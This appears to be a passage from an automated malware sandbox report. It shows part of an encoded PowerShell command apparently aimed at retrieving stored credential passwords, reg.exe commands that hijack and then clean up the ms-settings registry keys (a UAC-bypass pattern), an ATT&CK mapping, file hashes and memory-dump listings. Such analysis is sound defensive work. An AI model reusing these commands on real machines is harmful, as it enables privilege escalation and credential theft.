gAxADUALAA4ADkALAAyADUAMwAsADIAMgA5ACkAIAApAC4ARwBFAFQAbgBlAHQAdwBvAHIAawBjAHIAZQBkAGUAbgBUAGkAYQBsACgAKQAuAFAAYQBTAHMAdwBPAFIAZAApACAA " /f
3⤵
- Modifies registry class
- Modifies registry key
PID:1804

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .omg /f
3⤵
- Modifies registry class
- Modifies registry key
PID:836

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.omg\ /f
3⤵
- Modifies registry class
- Modifies registry key
PID:1844

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /f
3⤵
- Modifies registry class
- Modifies registry key
PID:840

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\F93E.tmp\F93F.tmp\F940.ps1
Filesize
13KB

MD5
a00d5ba95c525328c1de6dfdb91e7e6e

SHA1
cf5a296c0babe02b2a3e7b674b07be5e2457a44e

SHA256
e6257b6b2e9b91c41d69b36b2dfa595b338ad911acd659c3cd9b0b0f8081d302

SHA512
2910e74c07b96c1fd1ba17dec43811288e85ccefe3384560b466d5df7ec5a01eec4e971796acb4df102a06d6c63f03620043bc4abca49dc14cd5410c920fb44f

Download Submit
memory/364-58-0x000007FEF3CD0000-0x000007FEF46F3000-memory.dmp

Filesize
10.1MB

Download
memory/364-64-0x000000000258B000-0x00000000025AA000-memory.dmp

Filesize
124KB

Download
memory/364-68-0x000000000258B000-0x00000000025AA000-memory.dmp

Filesize
124KB

Download
memory/364-59-0x000007FEF2930000-0x000007FEF348D000-memory.dmp

Filesize
11.4MB

Download
memory/364-60-0x0000000002584000-0x0000000002587000-memory.dmp

Filesize
12KB

Download
memory/364-55-0x0000000000000000-mapping.dmp

Download
memory/364-67-0x0000000002584000-0x0000000002587000-memory.dmp

Filesize
12KB

Download
memory/836-63-0x0000000000000000-mapping.dmp

Download
memory/840-66-0x0000000000000000-mapping.dmp

Download
memory/1804-62-0x0000000000000000-mapping.dmp

Download
memory/1844-65-0x0000000000000000-mapping.dmp

Download
memory/1936-57-0x0000000140000000-0x0000000140027000-memory.dmp

Filesize
156KB

Download
memory/1936-54-0x000007FEFBBA1000-0x000007FEFBBA3000-memory.dmp

Filesize
8KB

Download
memory/1936-69-0x0000000140000000-0x0000000140027000-memory.dmp

Filesize
156KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads